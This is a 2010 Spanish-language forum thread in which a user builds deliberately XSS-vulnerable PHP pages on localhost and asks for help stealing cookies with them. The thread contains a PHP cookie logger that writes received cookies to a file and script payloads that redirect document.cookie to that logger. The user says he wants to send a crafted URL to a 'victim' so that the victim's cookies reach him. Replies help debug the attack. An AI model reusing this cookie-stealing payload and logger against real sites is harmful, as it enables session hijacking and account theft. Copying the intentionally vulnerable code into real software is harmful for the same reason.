duda xss

Dr [F] · 24 Julio 2010, 08:55 AM

Hola gente del foro, estaba en casa intentando practicar xss leyendo tutoriales, pero no me sale :S

miren hize unas paginas vulnerables, pero me sigue sin salir:

pagina: pindex.php

Código [Seleccionar]

<?php
if(isset($_COOKIE['user'])) echo $_COOKIE['user'];
?>
<html>
<head>
</head>
<body>
<form method="post" action="buscador.php">
<input type="text" name="palabrita">
<br>
<input type="submit" value="enviar"></form>
</body>
</html>

buscador.php

Código [Seleccionar]

<?php
$user = $_REQUEST['palabrita'];
setcookie("user", $user, time()+(60*60*24*365),"/");
?>
<html>
<head></head>
<body>
<a href="indexxx.php"> Pagina 1</a>
</body>
</html>

cookies.php

Código [Seleccionar]

<?
$cookie = $_GET['cookie'];
$fff = fopen("archivo.txt","a");
fwrite($fff, $cookie);
fclose($fff);
?>

y esta es la url que mando:

Código [Seleccionar]

http://localhost/buscador.php?palabrita=
<script>window.location='http://localhost/cookies.php?cookie='+document.cookie;</script>&enviar=;

el problema es que no me crea el archivo archivo.txt :S

alguien sabe a que se debe.. ? gracias

~ Yoya ~ · 24 Julio 2010, 19:34 PM

aprende php, lo unico vulnerable es el pindex.php

Dr [F] · 24 Julio 2010, 19:51 PM

es que no se que estoy haciendo mal -.-"

~ Yoya ~ · 25 Julio 2010, 01:23 AM

No es necesario enviar el valor como una Cookie...

Puede ser que el servidor tenga la directiva magic_quotes_gpc On y te escape las comillas simples y dobles de los valores que se envian via Get, Post o Cookie...

Prueba con este

Código (php) [Seleccionar]

<?php
if(isset($_POST['palabrita'])){
setcookie("user", $_POST['palabrita']);
}

if(isset($_COOKIE['user'])){
echo $_COOKIE['user'];
exit;
}

?>

<html>
<head>
</head>
<body>
<form method="post">
<input type="text" name="palabrita">
<br>
<input type="submit" value="enviar"></form>
</body>
</html>

Dr [F] · 25 Julio 2010, 07:56 AM

sigue sin salirme, sinceramente no se que estoy haciendo mal :S

Erfiug · 25 Julio 2010, 16:39 PM

Que nevegador utilizas? Algunos como IE8 tienen protecciones anti XSS que no permiten acceder directamente a la variable document.cookie

Dr [F] · 25 Julio 2010, 21:22 PM

sisi

utilizo mozilla 3.6 miren me quede toda la noche ayer y logre obtener una fucking cookie..

les dejo los codigos

Código [Seleccionar]

<?php
if(isset($_COOKIE['user'])) echo $_COOKIE['user'];
?>
<html>
<head>
</head>
<body>
<form method="post" action="buscador.php">
<input name="palabrita" type="text">
<br>
<input type="submit" value="enviar"></form>
<a
onclick="document.location='http://localhost/lalsa.php?cookie='+escape(document.cookie);" href="#"> Click here for details</a>
</body>
</html>

buscador.php

Código [Seleccionar]

<?php
$user = $_REQUEST['palabrita'];
setcookie("user", $user, time()+(60*60*24*365),"/");
echo $user;
?>
<html>
<head></head>
<body>
<a href="pindex.php"> Pagina 1</a>

lasla.php

Código [Seleccionar]



<?php
$cookie = $_GET['cookie'];
$archivo ="datos.txt";
$f = fopen($archivo,"w");
fputs($f, $cookie);
fclose ($f);
?>

el problema es el siguiente, yo quiero mandar una url a la victima y que sus cookies de esa pagina vulnerable se envien a mi, pero no se que url "maliciosa" mandar... me entienden ?

ya que si mando estO:

Código [Seleccionar]

<script><a
onclick="document.location='http://localhost/lalsa.php?cookie='+escape(document.cookie);" href="#"> Volver a la pagina</a></script>

me guarda en la cookie lo siguiente:

Código [Seleccionar]

token=8c610b4ae58115e366123efd8e7b7accd7ba525a2207acc6; u=fra; c=a1305ca10f94f2340770c73e26d427588f236709; user=%3Cscript%3Edocument.location%3D%27http%3A%2F%2Flocalhost%2Flalsa.php%3Fcookie%3D%27 escape%28document.cookie%29%3B%3C%2Fscript%3E;

y ahi no me esta guardando ningun usuario solo lo que puse acontinuacion de la variable palabrita :s
muchas gracias